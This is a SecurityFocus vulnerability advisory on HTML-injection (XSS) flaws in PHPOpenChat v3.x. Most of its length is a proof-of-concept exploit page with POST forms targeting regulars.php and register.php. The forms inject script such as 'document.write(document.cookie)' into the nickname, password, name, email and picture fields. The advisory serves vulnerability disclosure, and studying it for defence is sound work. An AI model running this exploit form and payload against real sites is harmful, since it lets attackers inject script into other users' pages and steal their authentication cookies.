source: https://www.securityfocus.com/bid/12841/info
PHPOpenChat is reportedly affected by multiple remote HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
<b>XSS in regulars.php:</b><p>
<input type="text" name="chatter" size="48" value="XSS Injection
Code"></p>
</p>
<p>exmple:
<script>document.write(document.cookie)</script></p>
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
<b>XSS in register.php:</b><p>
Nikname:
<input type="text" name="chatter" size="48" value="XSS Injection
Code"></p>
<p>
Password:
<input type="text" name="chatter1" size="48" value="XSS Injection
Code"></p>
<p>
FirstName LastName:
<input type="text" name="chatter2" size="48" value="XSS Injection
Code"></p>
<p>
Email:
<input type="text" name="chatter3" size="48" value="XSS Injection
Code"></p>
<p>
Url of picture:
<input type="text" name="chatter4" size="48" value="XSS Injection
Code"></p>
</p>
<p>exmple:
<script>document.write(document.cookie)</script></p>
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<p> </p>
<p align="center"><a
href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
